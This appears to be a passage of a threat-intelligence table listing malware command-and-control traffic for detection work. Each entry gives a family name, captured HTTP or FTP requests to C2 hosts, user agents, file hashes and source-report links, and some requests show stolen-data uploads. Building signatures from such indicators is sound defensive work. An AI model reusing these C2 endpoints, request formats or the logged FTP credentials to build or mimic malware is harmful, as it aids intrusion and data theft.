User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache

2012-11
http://vcvcvcvc.dyndns.org:8080/index.pl ?id=21378
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Content-Type: multipart/form-data; boundary=----------2B9250BB47EE537B
Host: vcvcvcvc.dyndns.org 
Content-Length: 272
Proxy-Connection: keep-alive
Pragma: no-cache
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache" Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) "06ddf39bc4b5c7a8950f1e8d11c44446 
2012
D4C6CD7276019CB861286ECC6B0525BE (rtf dropper)
4F8A44EF66384CCFAB737C8D7ADB4BB8" "http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/
http://doc.emergingthreats.net/bin/view/Main/2014359"
Andromeda POST /new/gate.php /gate.php "Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Content-Length: 32
Host: seantit.ru

mejRs96VP96+PIRfAjNy+Izj9E8jZscm" Mozilla/4.0 85F908A5BD0ADA2D72D138E038AECC7D http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Citadel POST /g.php /g.php "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: nologo0091.org
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache
......y.....m.....x.).600Y.J.z......Yy.<(X.T..... .....A.w....a.....}(R.........T...-:.N..>..........qqm.n.......\.<.X@>.." Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Citadel (Zbot var) POST /C270suqdh/file.php /file.php "Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: vivaspace2013.com
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache

..Cx.oB...3.Yc>........8|....M.........8...E.a4.!.A...A+.z.Q...,\.\<\.#.$?.........@;...C'J-jL...R....)3.HP....eu......." Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 3D6046E1218FB525805E5D8FDC605361 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Pony loader POST /ponyb/gate.php HTTP/1.0 /gate.php "/ponyb/gate.php HTTP/1.0
Host: mail.yaklasim.com
Accept: /
Accept-Encoding: identity, ;q=0
Accept-Language: en-US
Content-Length: 273
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

...Y........XT..L.S[.lG...<^-.a..v.'..K~# ......#.IP...6......<.C.M!..lL7.....$.?._..N.k>.`=." Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Reedum GET 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] "220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
USER user37704
331 .................. ............ ...... ........................ user37704
PASS intro22
230 ........................ user37704 ..................
TYPE A
200 ...... .................... .. A
PORT 10,0,2,15,4,24
500 ........................ .............. PORT
LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
500 LPRT .... ...................." 0ca4f93a848cf01348336a8c6ff22daf http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
APT1 WEBC2_RAVE GET /comp/sem/resources.htm /resources.htm "User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache
The Trojan parses (0x004016D0) the received data for the HTML comment tags:
<!-- [Base64 encoded data] -->" HTTP Mozilla/5.0(compatible+MSIE) a2534e9b7e4146368ea3245381830eb0 http://www.cyberengineeringservices.com/analysis-of-file-winsrv-exe/
backdoor ? GET /18110123/page_32262 308.html /page_32262 308.html "Accept: 
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: cuteoverload. dyndns . org
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Win32) http://www.fireeye.com/blog/technical/cyber-exploits/2012/09/analysis-of-malware-page.html#more-14
Banechant 1 GET /IGKKT /IGKKT "
Accept: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727)
Host: ow.ly
Connection: Keep-Alive . . . .

Error 301, implicitly redirects to malicious site
HTTP/1.1 301 Moved Permanently
Date: Fri, 15 Mar 2013 16:31:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5. 3. 2-1ubuntu4. 18
set-cookie: OWLYSID=f6f604d22494a738706d64353e3536d91c5d69e1; path=/
" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727) http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
Banechant payload dl 2 GET /adserv/logo.jpg HTTP /1.1 /logo.jpg "Accept: image/jpeg
User-Agent:Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2)
Connection: Keep-Alive
host: . symbisecure.com" Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2) http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
Beebus GET /windosdate/v6/default.aspx?ln=en-us /v6/default.aspx?ln=en-us "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: update.microsoft.com
Cookie: WC1=V=3&GUID=afe1e295d3c94b2ca137abc405a63a57" Mozilla/4.0 (compatible; ) http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Beebus C2 checkin GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 /s/asp?XAAAAM "/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 68.96.31.136" Mozilla/4.0 (compatible; ) d7ec457be3fad8057580e07cae74becb http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Beebus C2 checkin GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 /s/asp?XAAAAM "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: bee.businessconsults.net" Mozilla/4.0 (compatible; ) 7ed557921ac60dfcb295ebabfd972301 http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
Beebus data send POST /s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2 /s/asp?__u "User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host:
Content-Length: 563
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; )
Blackhole 2 GET /fded177fe12651bb038f3f11b01c4168/q.php /q.php "/fded177fe12651bb038f3f11b01c4168/q.php
Accept: text/html, application/xhtml+xml, /
Referer: http://www.jobs-located-near.com/Lanoka%20Harbor/NJ/08734/Internship/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 193.93.248.227
Connection: Keep-Alive" victim UA "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_blackhole-exploit-kit.pdf
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html"
Cookies /Cookiebag / Dalbot GET /1799.asp /1799.asp "Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: usnftc.org
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWWV5bX1ADBBgfBQoGDlYmKic8KjkuIz4lPy45UA==

'command=qwert;clientkey=2504;hostname=MALWAREHUNTER;'" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 0C28AD34F90950BC784339EC9F50D288 http://intelreport.mandiant.com/
Cookies /Cookiebag / Dalbot GET "/3961.html
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=

" "
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022;
.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 216.62.168.251:8080
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 8080 2c4cabb4ca19ddf87c7f11bad44bdf05 http://www.cyberengineeringservices.com/trojan-cookies/
Cookies /Cookiebag / Dalbot GET /8223.asp (also can be like /2007.asp, /2013.asp etc.) /8223.asp /2007.asp /2013.asp "/8223.asp
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 1.234.1.68
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWU1pcXlADBBgfBQoGDlYDCgUeDgcORgkIXVtcWVtQ" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 9b6692295fadf24b512d5f63e4f74d15 http://labs.alienvault.com/labs/index.php/2012/unveiling-a-spearphishing-campaign-and-possible-ramifications/
Cookies /Cookiebag / Dalbot GET /indexs.zip /indexs.zip "/indexs.zip
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 840BD11343D140916F45223BA05ABACB http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Coswid GET /old/google.png /google.png "Accept: . . . . . ,
User-Agent: [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32)
Host: firstwillnessclub.com" [redacted] fcfea+Mozilla/4.0 (compatible; MSIE 8.0; win32) "726ef24b8eff4c4121c73861756fb9a3
a4ba6540520c375875bf46cf8e19cb7d
09fd067b6d944bf111857f6f60b7471e
" http://labs.alienvault.com/labs/index.php/category/blog/snort-blog/page/2/
CVE-2012-0754 SWF in DOC GET /test.mp4 "Accept: /
Accept-Language: en-US
x-flash-version: 11,1,102,55
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 208.115.230.76
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) E92A4FC283EB2802AD6D0E24C7FCC857 http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html
CVE-2012-0779 GET /essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000 /essais.swf? "Accept: /
User-Agent: contype
Host: 204.45.73.69" contype 1750A38A44151493B675538A1AC2070B http://contagiodump.blogspot.com/2012/05/may-3-cve-2012-0779-world-uyghur.html
Darkmegi GET /20111230.jpg /20111230.jpg "/20111230.jpg
Host: images.hananren.com
User-Agent: Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727)
Cache-Control: no-cache" Mozilla/4.0+(compatible;+MSIE+6.0; +Windows+NT+5.1;+SV1;+ .NET+CLR+2.0.50727) 6C8F9658A390C24A9F4551DC15063927 http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html
Darkness DDos v8g GET /index.php?uid=587609&ver=8g%20XP /index.php?uid= "/index.php?uid=587609&ver=8g%20XP HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Host: vkotalke.info
Pragma: no-cache" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) F03Bc8Dcc090607F38Ffb3A36Ccacf48 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Depyot GET /new/3d/d/pdf.php?id=2 /3d/d/pdf.php?id= "/new/3d/d/pdf .php?id=2 HTTP/1. 1
User-Agent: Mozilla/4.0 (compatible)
Host: www.3dvideo. ru
Cache-Control: no-cache
" Mozilla/4.0 (compatible) 651fad35d276e5dedc56dfe7f3b5f125 http://www.fireeye.com/blog/technical/targeted-attack/2013/03/internet-explorer-8-exploit-found-in-watering-hole-campaign-targeting-chinese-dissidents.html
Destory Rat / Sogu / Thoper POST /update?id=000f6b50 /update?id= "/update?id=000f6b50
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705)
Host: exchange.likescandy.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 09B8B54F78A10C435CD319070AA13C28 http://labs.alienvault.com/labs/index.php/2012/the-connection-between-the-plugx-chinese-gang-and-the-latest-internet-explorer-zeroday/
Destory Rat / Sogu / Thoper POST /update?id=3109c2a2 /update?id= "/update?id=3109c2a2
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;)
Host: path.alyac.org
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
Destory Rat / Sogu / Thoper POST /update?product=windows /update?product=windows "/update?product=windows
Accept: /
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1; http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf
DirtJumper DDoS POST /678/index.php /index.php "/678/index.php HTTP/1.0
Host: asdaddddaaaa.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

k=426924814555748" Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Dirtjumper ddos POST /boi854tr4w.php /boi854tr4w.php "/boi854tr4w.php HTTP/1.0
Host: coppercreek.ru
Accept: /
Accept-Encoding: identity, ;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://blog.shadowserver.org/page/3/
DNSChanger POST /d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg== "/d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg==
Content-Type: application/x-www-form-urlencoded
Host: borderspot.net
User-Agent: Mozilla/6.0 (Windows; w3.0)
Content-Length: 193
Connection: close
Cache-Control: no-cache

data=qSrTzGL0RMCyDnY9+xJEQe5nNLundsMqfdgBGzUoJ0xVTU/DzQWC3DLbXB/UfETT1o6F2ZIbLEGVJ0MOJTSDP9PX4aSS/OagY6143bGp0y/uGVSLVL0u+uo+x5NraqI7DJaKGg7TCqXkTszGInUBxiK1/hKL2oFYpjsSeY04x+zt2a9dO+UI5VhP0W45" Mozilla/6.0 (Windows; w3.0) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Downloader BMP GET /images/evil.bmp /evil.bmp "/images/evil.bmp
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) 4IRh2K1I3Zl=O
Host: www.badsite4you.com
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 8.0 ;Windows NT 6.1; U.S. ) d166a59e71535a42267e9fa993ca8e7e http://www.cyberengineeringservices.com/downloader-bmp/
Einstein GET /gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs /gttfi.php?id= "/ gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 1c2dfd36ad8cad978a0859d459f10326 http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
Einstein data send POST /gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK /gttfi.php?id= "/ gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: family.mobwork.net
Content-Length: 420
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 1c2dfd36ad8cad978a0859d459f10326 http://www.cyberengineeringservices.com/trojan-matryoshka-and-trojan-einstein/
EK - Blackhole 2 landing GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd /default-php-version.php?mdm= "Accept: /
Accept-Language: en-US
Referer: http://autorepairgreeley.info/news/default-php-version.php
x-flash-version: 10,1,53,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: autorepairgreeley.info
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
EK Blackhole 1 GET /showthread.php?t=d7ad916d1c0396ff /showthread.php?t= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: 88.85.99.44:8080
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) 8080 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
EK Phoenix GET /navigator/jueoaritjuir.php /jueoaritjuir.php "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 78.83.233.242:8080
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
Enfal / Lurid GET /oi2c/wlc3/ [redacted]:00-00-00-00-00-00/ij83d /wlc3/ "Host: home. coffeeibus . com
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid GET /trandocs/nm/.[redacted] :00-00-00-00-00-00lCrrrwhite /nm/ "Host: note.webmail-temp.com
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid POST /cgi-bin/CMS_SubitAll.cgi /CMS_SubitAll.cgi "Host: virustotel.3-a.net
Content-Length: 115
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid POST /cgl-bin/Owpq4.cgi /Owpq4.cgi "Host: note.webmail-temp.com
Content-Length: 83
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Enfal / Lurid POST /Sjwpc/odw3ux "Host: hone.coffeeibus.com
Content-length: 104
Cache-Control: no-cache" http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Flashback OSX GET /statistics.html /statistics.html "Host: cuojshtbohnt.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1" Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:2; id: 1A698BE9-0211-5EB4-AFDC-644AA479D972) Gecko/20100101 Firefox/9.0.1 5616687FAC5D040AE65CB1B08717A6AA http://contagiodump.blogspot.com/2012/04/i-have-been-tracking-infections-too-and.html
Foxy POST /404error.asp /404error.asp "Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache" Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) d271ae0f4e9230af3b61eafe7f671fde http://www.cyberengineeringservices.com/364/
Foxy Checkin GET /images/leftnav_prog_bg.jpg /leftnav_prog_bg.jpg "User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)
Host: www.gobroadreach.com
Cache-Control: no-cache" Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0) d271ae0f4e9230af3b61eafe7f671fde http://www.cyberengineeringservices.com/364/
Gh0st ASP ver GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69 /v2/1oginv2.asp? "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR
1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Host: .palms-us.org" Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; .NET CLR http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Gh0st PHP ver GET /ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l /queenfun/vl /login.php? "HTTP/1 .1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: . ibmunion.net" Mozilla/4.0 (compatible; ) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
Gh0st v2000 var n "v2010........f...............(
......Service Pack 2..?..|...|...|0.@.." v2010 "v2010........f...............(
......Service Pack 2..?..|...|...|0.@..............4$..............4$..^.....|.....]...]......{l....$.0%.|.....a2.rSingleO....t.....2.........d
....j.DELLXT..............................................g...00-50-56-3C-F6-41...'......." B1D09374006E20FA795B2E70BF566C6D http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
GoogleAdC2 GET /html/lost.html /lost.html "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: news.googleupdateservices.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) 90993b5279365b204148e8b04edf477f http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
GoogleAdC2 2nd stage GET /Trojan2.jpg /Trojan2.jpg "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: www.reallybad.com
Connection: Keep-Alive" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) 90993b5279365b204148e8b04edf477f http://www.cyberengineeringservices.com/cve-2011-0609-payload-a-exe-analysis/
Googles GET /sll/monica.jpg /monica.jpg "User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
=1j2CVh2s#IE6DBo6Iru; MNA)
Host: www.avvmail.com
Cache-Control: no-cache" "
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0;
Mozilla/4.0(compatible;WindowsNT5.1; MSIE8.0) 
Mozilla/4.0(compatible;WindowsNT5.1; MSIE7.0;Trident/4.0" BF80DBF969B73790253F683CD723FD71 http://intelreport.mandiant.com/
Greencat GET /<HOSTNAME>/ "GET /<HOSTNAME>/ HTTP/1.1
Accept: /
Pragma: no-cache
Cache-Control: max-age=0
Cache-Control: no-cache
Connection: Keep-Alive
Computer: <HOSTNAME>
User-Agent: Mozilla/4.0
Host: flash.aunewsonline.com
Content-Length: <ContentLength>

<HOSTNAME> Connected!" "Mozilla/4.0 Mozilla/4.0(compatible;MSIE8.0; WindowsNT5.1;SV1) Mozilla/5.0
Mozilla/4.0" 57e79f7df13c0cb01910d0c688fcd296 http://intelreport.mandiant.com/
Gtalk GET /facebook.png /facebook.png "Accept: /
Pragma: no-cache
Cache-Control: max-age=0
Cache-Control: no-cache
Connection: Keep-Alive
Computer: <HOSTNAME>
User-Agent: Mozilla/4.0
Host: flash.aunewsonline.com
Content-Length: <ContentLength>

<HOSTNAME> Connected!" [redacted] +Mozllla/4.0 (compatible; MSIE 8.0; Win32) http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf
HOIC DDoS GET / HTTP/1.0 "Accept: /
Accept-Language: en
Host: www.hoic_target_site.com" http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html
Imaut GET /setting.doc /setting.doc "Host: www.yahoo.com
Cache-Control: no-cache" 823e9bab188ad8cb30c14adc7e67066d
IRCbot GET /check_ver.php?version=1.09 /check_ver.php "/check_ver.php?version=1.09
User-Agent: -
Host: rc.rizalof.com
Cache-Control: no-cache

HTTP/1.0 200 (OK)" - 6716a417f82ccedf0f860b735ac0187 http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
IXESHE GET "/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/
